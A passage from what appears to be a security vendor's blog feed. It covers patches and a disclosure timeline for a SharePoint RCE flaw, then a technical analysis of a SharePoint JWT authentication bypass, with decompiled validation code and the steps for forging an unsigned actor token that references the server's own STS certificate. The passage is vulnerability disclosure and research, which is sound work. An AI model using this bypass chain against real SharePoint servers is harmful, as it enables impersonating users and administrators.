undefined;'>The vendor has provided the following updates to remediate CVE-2026-63520.</span></p><p></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://support.microsoft.com/kb/5002893"><span style='font-size: undefined;'>KB5002893</span></a><span style='font-size: undefined;'> - Microsoft SharePoint Server Subscription Edition (version </span><span style='font-size: undefined;'><span data-type='inlineCode'>16.0.19725.20522</span></span><span style='font-size: undefined;'>).</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://support.microsoft.com/help/5002894"><span style='font-size: undefined;'>KB5002894</span></a><span style='font-size: undefined;'> - Microsoft SharePoint Server 2019 (version </span><span style='font-size: undefined;'><span data-type='inlineCode'>16.0.10417.20198</span></span><span style='font-size: undefined;'>).</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://support.microsoft.com/help/5002896"><span style='font-size: undefined;'>KB5002896</span></a><span style='font-size: undefined;'> - Microsoft SharePoint Server 2019 (version </span><span style='font-size: undefined;'><span data-type='inlineCode'>16.0.10417.20198</span></span><span style='font-size: undefined;'>).</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://support.microsoft.com/help/5002905"><span style='font-size: undefined;'>KB5002905</span></a><span style='font-size: undefined;'> - Microsoft SharePoint Enterprise Server 2016 (version </span><span style='font-size: undefined;'><span data-type='inlineCode'>16.0.5565.1001</span></span><span style='font-size: undefined;'>).</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><a href="http://support.microsoft.com/5002906"><span style='font-size: undefined;'>KB5002906</span></a><span style='font-size: undefined;'> - Microsoft SharePoint Enterprise Server 2016 (version </span><span style='font-size: undefined;'><span data-type='inlineCode'>16.0.5565.1001</span></span><span style='font-size: undefined;'>).</span></p></li></ul><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>For additional details, please see the vendor </span><a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-63520"><span style='font-size: undefined;'>security bulletin</span></a><span style='font-size: undefined;'> and </span><a href="https://learn.microsoft.com/en-us/officeupdates/sharepoint-updates"><span style='font-size: undefined;'>product updates</span></a><span style='font-size: undefined;'> page.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Exposure Command, InsightVM, and Nexpose</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM and Nexpose customers will be able to assess their exposure to the RCE vulnerability, CVE-2026-63520, with authenticated vulnerability checks available in the August 12 content release. Customers can assess their exposure to the authentication bypass vulnerability, CVE-2026-55040, with authenticated vulnerability checks available in the July 15 content release.</span></p><h2><span style='font-size: undefined;'>Upcoming webinar</span></h2><p>Interested in the AI tooling leveraged throughout the research process? Join Rapid7's Stephen Fewer and Douglas McKee on Thursday, August 13 to walk through the full exploit chain, actionable next steps and more. <a href="https://www.brighttalk.com/webcast/10457/673829?utm_source=Rapid7&amp;utm_medium=brighttalk&amp;utm_medium=organic-social&amp;utm_campaign=673829%3Futm_source%3Dlinkedin&amp;utm_campaign=global-mdr-q3-2026-global-webinar-prospect-eng-etos-25&amp;utm_content=microsoft-sharepoint-webinar&amp;utm_term=touch1" target="_blank">Register here</a>.</p><h2 style="direction: ltr;">Disclosure timeline</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>May 18, 2026:</strong></span><span style='font-size: undefined;'> Rapid7 discloses an unauthenticated RCE exploit chain to Microsoft. Microsoft acknowledges receipt of the disclosure the same day.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>May 20, 2026:</strong></span><span style='font-size: undefined;'> Microsoft confirms the findings and indicates that the exploit chain will be patched across two scheduled update cycles - the authentication bypass component in July, and the RCE component in August.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>May 21, 2026:</strong></span><span style='font-size: undefined;'> Rapid7 acknowledges the disclosure schedule and requests supporting information. Microsoft requests a 30 day stay on disclosure of technical details and publication of PoC.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>May 29, 2026:</strong></span><span style='font-size: undefined;'> Rapid7 agrees to a 30 day stay on technical details with a proviso to publish earlier should either exploitation in-the-wild or third-party publication of details occur within the 30 days. Microsoft confirms the disclosure plan the same day.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>July 21, 2026:</strong></span><span style='font-size: undefined;'> Rapid7 requests supporting information for the upcoming disclosure.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>July 31, 2026:</strong></span><span style='font-size: undefined;'> Microsoft provides supporting information to Rapid7.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>August 11, 2026:</strong></span><span style='font-size: undefined;'> This disclosure for CVE-2026-63520.</span></p></li><li><span style='font-size: undefined;'><strong>August 13, 2026:</strong></span><span style='font-size: undefined;'> Microsoft clarifies that two additional products (Project Server and Office Web Apps Server) are not affected by CVE-2026-63520, contrary to details provided by Microsoft on July 31. This disclosure blog has been updated to reflect this.</span></li><li><span style='font-size: undefined;'><strong>August 18, 2026:</strong></span><span style='font-size: undefined;'> CISA adds CVE-2026-55040 to its KEV catalog.</span></li><li><span style='font-size: undefined;'><strong>August 24, 2026:</strong></span><span style='font-size: undefined;'> Rapid7 publishes technical details for CVE-2026-63520 ahead of schedule after technical details are published by a third-party.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-cve-2026-63520-microsoft-sharepoint-remote-code-execution-fixed</link>
      <guid isPermaLink="false">blt66fb0d3040f2de2f</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Vulnerability Disclosure]]></category>
      <category><![CDATA[Research]]></category><dc:creator><![CDATA[Stephen Fewer]]></dc:creator>
      <pubDate>Tue, 11 Aug 2026 13:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Rapid7 Analysis: Microsoft SharePoint JWT Token Authentication Bypass (CVE-2026-55040)]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On July 14, 2026, Rapid7 and Microsoft </span><a href="/blog/post/ve-cve-2026-55040-microsoft-sharepoint-jwt-token-authentication-bypass-fixed/" target="_self"><span style='font-size: undefined;'>disclosed</span></a><span style='font-size: undefined;'> CVE-2026-55040, an authentication bypass vulnerability affecting Microsoft SharePoint. Today we are publishing a technical analysis of the vulnerability along with an accompanying proof-of-concept (PoC) </span><a href="https://github.com/sfewer-r7/CVE-2026-55040" target="_blank"><span style='font-size: undefined;'>script</span></a><span style='font-size: undefined;'>.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5767417f98d6189f/6a79966a89eb5ce3acab3aa8/CVE-2026-55040.png" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="CVE-2026-55040.png" asset-alt="CVE-2026-55040.png" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5767417f98d6189f/6a79966a89eb5ce3acab3aa8/CVE-2026-55040.png" data-sys-asset-uid="blt5767417f98d6189f" data-sys-asset-filename="CVE-2026-55040.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="CVE-2026-55040.png" sys-style-type="display"/></figure><p style="text-align: center;"><em>Figure 1: The Rapid7 Labs PoC for CVE-2026-55040.</em></p><p>⠀</p><p><span style='font-size: undefined;'>A remote unauthenticated attacker can leverage CVE-2026-55040 to bypass authentication on a vulnerable SharePoint server, and perform operations as a SharePoint site user or administrator. The vulnerability is due to several issues in the JWT token validation pipeline.</span></p><h2 style="direction: ltr;">Analysis</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The following technical analysis is based upon SharePoint Server Subscription Edition version </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>16.0.19725.20210</span></span><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>A critical authentication bypass vulnerability exists in SharePoint Server Subscription Edition's JWT token validation pipeline. The root cause is a chain of four distinct weaknesses that, when combined, allow an unauthenticated remote attacker to forge a valid JWT and impersonate any SharePoint site user.</span></p><p><span style='font-size: undefined;'>The below analysis is based upon decompilation and code review of the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Microsoft.SharePoint.IdentityModel</span></span><span style='font-size: undefined;'> module from a fully patched SharePoint Server Subscription Edition instance. The vulnerability resides in the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>SPJsonWebSecurityTokenHandlerV2</span></span><span style='font-size: undefined;'> class and its base class </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>SPJsonWebSecurityBaseTokenHandlerV2</span></span><span style='font-size: undefined;'>, which together implement the token parsing and validation logic for Bearer service-to-service (S2S) tokens.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>SharePoint's S2S authentication uses a nested JWT structure: an outer token containing user identity claims, and an inner "actor token" embedded in the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>actortoken</span></span><span style='font-size: undefined;'> claim. The actor token represents the calling application and is expected to be cryptographically signed by a trusted certificate.</span></p><p><span style='font-size: undefined;'>The validation flow begins in </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>SPApplicationAuthenticationModuleV2.TryExtractAndValidateToken()</span></span><span style='font-size: undefined;'>, which extracts the Bearer token from the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Authorization</span></span><span style='font-size: undefined;'> header, parses it via </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>SPJsonWebSecurityBaseTokenHandlerV2.ReadToken()</span></span><span style='font-size: undefined;'>, and then validates it via </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>SPJsonWebSecurityTokenHandlerV2.ValidateToken()</span></span><span style='font-size: undefined;'>. The debugger call stack below shows the call stack at the time of calling </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>ValidateToken</span></span><span style='font-size: undefined;'>.</span></p><p></p><pre language="html">Microsoft.SharePoint.IdentityModel.dll!Microsoft.SharePoint.IdentityModel.SPJsonWebSecurityTokenHandlerV2.ValidateToken(System.IdentityModel.Tokens.SecurityToken token) (IL=0x01BC, Native=0x00007FFC730AA430+0x4A2)
 	Microsoft.SharePoint.IdentityModel.dll!Microsoft.SharePoint.IdentityModel.SPApplicationAuthenticationModuleV2.TryExtractAndValidateToken(System.Web.HttpContext httpContext, out Microsoft.SharePoint.IdentityModel.SPIncomingTokenContextV2 tokenContext, out Microsoft.SharePoint.IdentityModel.SPIdentityProofToken identityProofToken) (IL=???, Native=0x00007FFC730A2A70+0x9FB)
 	Microsoft.SharePoint.IdentityModel.dll!Microsoft.SharePoint.IdentityModel.SPApplicationAuthenticationModuleV2.ConstructIClaimsPrincipalAndSetThreadIdentity(System.Web.HttpApplication httpApplication, System.Web.HttpContext httpContext, Microsoft.SharePoint.IdentityModel.SPFederationAuthenticationModuleV2 fam, out string tokenType) (IL≈0x0041, Native=0x00007FFC730A1860+0xB2)
 	Microsoft.SharePoint.IdentityModel.dll!Microsoft.SharePoint.IdentityModel.SPApplicationAuthenticationModuleV2.AuthenticateRequest(object sender, System.EventArgs e) (IL≈0x0139, Native=0x00007FFC7196F9D0+0x3E4)
 	System.Web.dll!System.Web.HttpApplication.SyncEventExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() (IL=0x005D, Native=0x00007FFC71846AE0+0xD1)
 	System.Web.dll!System.Web.HttpApplication.ExecuteStepImpl(System.Web.HttpApplication.IExecutionStep step) (IL=epilog, Native=0x00007FFC71846A00+0xB6)
 	System.Web.dll!System.Web.HttpApplication.ExecuteStep(System.Web.HttpApplication.IExecutionStep step, ref bool completedSynchronously) (IL≈0x0015, Native=0x00007FFC71846640+0x5E)
 	System.Web.dll!System.Web.HttpApplication.PipelineStepManager.ResumeSteps(System.Exception error) (IL≈0x027A, Native=0x00007FFC71842E00+0x77A)
 	System.Web.dll!System.Web.HttpApplication.BeginProcessRequestNotification(System.Web.HttpContext context, System.AsyncCallback cb) (IL=0x0031, Native=0x00007FFC71842D50+0x83)
 	System.Web.dll!System.Web.HttpRuntime.ProcessRequestNotificationPrivate(System.Web.Hosting.IIS7WorkerRequest wr, System.Web.HttpContext context) (IL≈0x00B0, Native=0x00007FFC7183C7A0+0x1D3)
 	System.Web.dll!System.Web.Hosting.PipelineRuntime.ProcessRequestNotificationHelper(System.IntPtr rootedObjectsPointer, System.IntPtr nativeRequestContext, System.IntPtr moduleData, int flags) (IL≈0x0131, Native=0x00007FFC7183A4E0+0x41A)
 	System.Web.dll!System.Web.Hosting.PipelineRuntime.ProcessRequestNotification(System.IntPtr rootedObjectsPointer, System.IntPtr nativeRequestContext, System.IntPtr moduleData, int flags) (IL≈0x0000, Native=0x00007FFC7183A070+0x13)
 	[Managed to Native Transition]
 	System.Web.dll!System.Web.Hosting.PipelineRuntime.ProcessRequestNotificationHelper(System.IntPtr rootedObjectsPointer, System.IntPtr nativeRequestContext, System.IntPtr moduleData, int flags) (IL≈0x01E7, Native=0x00007FFC7183A4E0+0x4C1)
 	System.Web.dll!System.Web.Hosting.PipelineRuntime.ProcessRequestNotification(System.IntPtr rootedObjectsPointer, System.IntPtr nativeRequestContext, System.IntPtr moduleData, int flags) (IL≈0x0000, Native=0x00007FFC7183A070+0x13)
 	[Appdomain Transition]</pre><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Weakness 1: RequireSignedTokens disabled</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The first and most fundamental weakness is in </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>SPJsonWebSecurityTokenHandlerV2.ValidateToken()</span></span><span style='font-size: undefined;'>. When constructing the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>TokenValidationParameters</span></span><span style='font-size: undefined;'> for the underlying </span><span style='font-size: undefined;'><span data-type='inlineCode'>Microsoft.IdentityModel</span></span><span style='font-size: undefined;'> JWT library, the code explicitly disables signature requirements:</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="csharp">// SPJsonWebSecurityTokenHandlerV2.cs - ValidateToken() - Line 212
val.RequireSignedTokens = false;</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>This single line disables the JWT library's cryptographic signature verification. When </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>RequireSignedTokens</span></span><span style='font-size: undefined;'> is </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>false</span></span><span style='font-size: undefined;'>, the library accepts tokens with </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>alg: none</span></span><span style='font-size: undefined;'> in the header, meaning no signature is required on the outer token at all. The library still parses the JWT and populates claims, but never performs any cryptographic verification of the outer token.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The full context of the method:</span></p><p></p><pre language="csharp">// SPJsonWebSecurityTokenHandlerV2.cs - Lines 165-223
public override ReadOnlyCollection&lt;ClaimsIdentity&gt; ValidateToken(SecurityToken token)
{
    // ...
    TokenValidationParameters val = new TokenValidationParameters();
    val.CertificateValidator = ((SecurityTokenHandler)(object)this).Configuration.CertificateValidator;
    val.SaveSigninToken = ((SecurityTokenHandler)(object)this).Configuration.SaveBootstrapContext;
    val.ValidateAudience = false; // &lt;--- [1]
    val.ValidateIssuer = false; // &lt;--- [2]
    List&lt;X509SecurityKey&gt; list = new List&lt;X509SecurityKey&gt;();
    // ... populates list with trusted signing keys ...
    val.IssuerSigningKeys = (IEnumerable&lt;SecurityKey&gt;)list;
    val.RequireSignedTokens = false; // &lt;--- [3]
    // ...
    SecurityToken securityToken = default(SecurityToken);
    return new ReadOnlyCollection&lt;ClaimsIdentity&gt;(
        ((JwtSecurityTokenHandler)this).ValidateToken(
            ((JwtSecurityToken)sPJwtSecurityToken).RawData, val, ref securityToken
        ).Identities.ToList()
    );
}</pre><p></p><p><span style='font-size: undefined;'>At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[1]</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[2]</span></span><span style='font-size: undefined;'>, the built-in audience and issuer validation from the JWT library are also disabled, SharePoint implements its own validation logic in separate methods. At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[3]</span></span><span style='font-size: undefined;'>, the critical </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>RequireSignedTokens = false</span></span><span style='font-size: undefined;'> is set. The resulting call to the base </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>JwtSecurityTokenHandler.ValidateToken()</span></span><span style='font-size: undefined;'> processes the JWT without verifying any cryptographic signature.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Weakness 2: Actor token x5t resolution without signature verification</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>After </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>ReadToken()</span></span><span style='font-size: undefined;'> parses the JWT, SharePoint's custom validation code resolves the actor token's signing key using the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>x5t</span></span><span style='font-size: undefined;'> (X.509 certificate thumbprint) header. This occurs in </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>SPJsonWebSecurityBaseTokenHandlerV2</span></span><span style='font-size: undefined;'>:</span></p><p></p><pre language="csharp">// SPJsonWebSecurityBaseTokenHandlerV2.cs - Lines 92-103
SecurityKeyIdentifier signingKeyIdentifier = GetSigningKeyIdentifier(sPJwtSecurityToken.ActorToken); // &lt;--- [1]
((SecurityTokenHandler)this).Configuration.IssuerTokenResolver.TryResolveToken(
    signingKeyIdentifier, out var token2); // &lt;--- [2]
if (token2 != null)
{
    ((JwtSecurityToken)sPJwtSecurityToken.ActorToken).SigningToken = token2; // &lt;--- [3]
}</pre><p></p><p><span style='font-size: undefined;'>At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[1]</span></span><span style='font-size: undefined;'>, the call to </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>GetSigningKeyIdentifier</span></span><span style='font-size: undefined;'> extracts the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>x5t</span></span><span style='font-size: undefined;'> value directly from the actor token's JWT header:</span></p><p></p><pre language="csharp">// SPJsonWebSecurityBaseTokenHandlerV2.cs - GetSigningKeyIdentifier - Lines 135-160
private SecurityKeyIdentifier GetSigningKeyIdentifier(SPJwtSecurityToken jwtToken)
{
    JwtHeader header = ((JwtSecurityToken)jwtToken).Header;
    // ...
    if (string.Equals(header.Alg, "RS256"))
    {
        if (!((Dictionary&lt;string, object&gt;)(object)header).TryGetValue("x5t", out object value))
        {
            throw new SecurityTokenException("Invalid JWT token. Not able to find SigningKeyIdentifier...");
        }
        securityKeyIdentifierClause = new X509ThumbprintKeyIdentifierClause(
            SPBase64UrlEncoder.DecodeBytes(value as string)); // &lt;--- attacker-controlled x5t
    }
    // ...
}</pre><p></p><p><span style='font-size: undefined;'>At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[2]</span></span><span style='font-size: undefined;'>, the call to </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>SPIssuerTokenResolver.TryResolveTokenCore</span></span><span style='font-size: undefined;'> searches all trusted certificates, including SharePoint's own local Security Token Service (STS) signing certificate, for a thumbprint match:</span></p><p></p><pre language="csharp">// SPIssuerTokenResolver.cs - TryResolveTokenCore - Lines 118-142
protected override bool TryResolveTokenCore(SecurityKeyIdentifierClause keyIdentifierClause, out SecurityToken token)
{
    // ... searches TrustedLoginProviders, TrustedSecurityTokenServices ...
    if (TryResolveTokenCoreWithAccessProvider(local.LocalLoginProvider, keyIdentifierClause, out token)) // &lt;--- [4]
    {
        return true;
    }
    return false;
}</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[4]</span></span><span style='font-size: undefined;'>, the resolver checks the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>LocalLoginProvider</span></span><span style='font-size: undefined;'> access provider, SharePoint's own STS signing certificate, whose x509 certificate can be retrieved via the unauthenticated </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/_layouts/15/metadata/json/1</span></span><span style='font-size: undefined;'> endpoint. If an attacker sets the actor token's </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>x5t</span></span><span style='font-size: undefined;'> header to the thumbprint of SharePoint's STS certificate, the resolver finds a match and returns an </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>X509SecurityToken</span></span><span style='font-size: undefined;'> wrapping that certificate. At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[3]</span></span><span style='font-size: undefined;'>, this token is assigned to the actor token's </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>SigningToken</span></span><span style='font-size: undefined;'> property.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>At no point in this flow is the actor token's signature (In our example we use the string </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>AAAA</span></span><span style='font-size: undefined;'> as a signature in a forged token) cryptographically verified against the resolved signing key. The code resolves the key from </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>x5t</span></span><span style='font-size: undefined;'>, populates </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>SigningToken</span></span><span style='font-size: undefined;'>, but never calls any signature verification function.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Weakness 3: Issuer validation accepts unregistered certificates</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>After setting the actor token's </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>SigningToken</span></span><span style='font-size: undefined;'>, the code proceeds to call </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>ValidateIssuer(token)</span></span><span style='font-size: undefined;'>. For a token that contains an actor token </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>SigningToken</span></span><span style='font-size: undefined;'> value (which we just achieved above), the logic in </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>ValidateIssuer</span></span><span style='font-size: undefined;'> takes the below path:</span></p><p></p><pre language="csharp">// SPJsonWebSecurityBaseTokenHandlerV2.cs - ValidateIssuer(SPJwtSecurityToken) - Lines 745-750
if (token.ActorToken != null && ((JwtSecurityToken)token.ActorToken).SigningToken != null)
{
    ULS.SendTraceTag(573368525u, ..., "Validating the actor token's signing token.");
    ValidateIssuer(((JwtSecurityToken)token.ActorToken).SigningToken as X509SecurityToken,
                   ((JwtSecurityToken)token.ActorToken).Issuer);
    return;
}</pre><p></p><p><span style='font-size: undefined;'>This calls the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>ValidateIssuer(X509SecurityToken, string)</span></span><span style='font-size: undefined;'> overload which accepts tokens signed by unregistered certificates:</span></p><p></p><pre language="csharp">// SPJsonWebSecurityBaseTokenHandlerV2.cs - Lines 788-812
private void ValidateIssuer(X509SecurityToken signingKey, string tokenIssuer)
{
    // ...
    SPTrustedSecurityTokenService providerBySigningCertificate =
        SPSecurityTokenServiceManager.LocalOrThrow.TrustedSecurityTokenServices
            .GetProviderBySigningCertificate(signingKey.Certificate, tokenIssuer); // &lt;--- [1]

    if (null == providerBySigningCertificate) // &lt;--- [2]
    {
        ULS.SendTraceTag(594416645u, ..., "ValidateTokenIssuer accepted Issuer '{0}' because " +
            "no registered STS matches the signing certificate '{1}'",
            tokenIssuer, signingKey.Certificate.Subject);
        return; // &lt;--- ACCEPTED
    }
    if (SPTrustedProviderBase.IssuerNameMatches(tokenIssuer, providerBySigningCertificate.RegisteredIssuerName))
    {
        return;
    }
    throw new SecurityTokenException("Issuer name is not registered"); // &lt;--- REJECTED
}</pre><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[1]</span></span><span style='font-size: undefined;'> above, the code searches the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>TrustedSecurityTokenServices</span></span><span style='font-size: undefined;'> collection for a provider whose signing certificate matches. SharePoint's local STS signing certificate belongs to the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>LocalLoginProvider</span></span><span style='font-size: undefined;'> access provider, which is not in the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>TrustedSecurityTokenServices</span></span><span style='font-size: undefined;'> collection. Therefore, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>GetProviderBySigningCertificate</span></span><span style='font-size: undefined;'> returns </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>null</span></span><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[2]</span></span><span style='font-size: undefined;'>, when the result is </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>null</span></span><span style='font-size: undefined;'>, the method accepts the issuer unconditionally and returns to the caller instead of throwing a </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>SecurityTokenException</span></span><span style='font-size: undefined;'> exception.</span></p><p><span style='font-size: undefined;'>The intent appears to be accepting tokens from certificates not explicitly registered, but the effect is that an attacker who references SharePoint's own STS certificate via </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>x5t</span></span><span style='font-size: undefined;'> passes issuer validation because that certificate is not found in the specific </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>TrustedSecurityTokenServices</span></span><span style='font-size: undefined;'> collection being searched.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Weakness 4: GetTokenSignature non-cryptographic check</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The final validation step involves </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>GetTokenSignature</span></span><span style='font-size: undefined;'>, which is called during session token construction. This method requires a non-empty signature but performs no cryptographic verification:</span></p><p></p><pre language="csharp">// SPJsonWebSecurityBaseTokenHandlerV2.cs - Lines 879-920
public static string GetTokenSignature(SPJwtSecurityToken jwtToken)
{
	SPArgumentHelperV2.LogAndThrowOnNull(TaggingUtilities.ReserveTag(591196938u), ULSCat.msoulscat_WSS_SecurityTokenHandler, "jwtToken", jwtToken);
	string rawData = ((JwtSecurityToken)jwtToken).RawData;
	if (string.IsNullOrWhiteSpace(rawData) && string.IsNullOrWhiteSpace(((JwtSecurityToken)jwtToken).RawSignature))
	{
		ULS.SendTraceTag(591196937u, ULSCat.msoulscat_WSS_SecurityTokenHandler, ULSTraceLevel.Unexpected, "The SPJwtSecurityToken doesn't have a signature.");
		throw new InvalidOperationException(SPResource.GetString(CultureInfo.InvariantCulture, "NullBootstrapToken"));
	}
	string text = ((JwtSecurityToken)jwtToken).RawSignature;
	if (string.IsNullOrWhiteSpace(text))
	{
		text = rawData.Substring(rawData.LastIndexOf('.') + 1); // &lt;--- [1]
	}
	if (string.IsNullOrWhiteSpace(text))
	{
		if (jwtToken.ActorToken != null)
		{
			text = GetTokenSignature(jwtToken.ActorToken); // &lt;--- [2]
			StringBuilder stringBuilder = new StringBuilder();
			stringBuilder.Append(jwtToken.Audience);
			stringBuilder.Append(',');
			stringBuilder.Append(((System.IdentityModel.Tokens.SecurityToken)(object)jwtToken).ValidFrom.ToFileTimeUtc());
			stringBuilder.Append(',');
			stringBuilder.Append(((System.IdentityModel.Tokens.SecurityToken)(object)jwtToken).ValidTo.ToFileTimeUtc());
			stringBuilder.Append(',');
			foreach (Claim claim in ((JwtSecurityToken)jwtToken).Claims)
			{
				stringBuilder.Append(claim.Value);
				stringBuilder.Append(',');
			}
			return stringBuilder?.ToString() + text; // &lt;--- [3]
		}
		ULS.SendTraceTag(573368524u, Category, ULSTraceLevel.Unexpected, "SPJsonWebSecurityBaseTokenHandlerV2: ActorToken doesn't have a signature.");
		throw new InvalidOperationException(SPResource.GetString(CultureInfo.InvariantCulture, "NullBootstrapToken"));
	}
	return text;
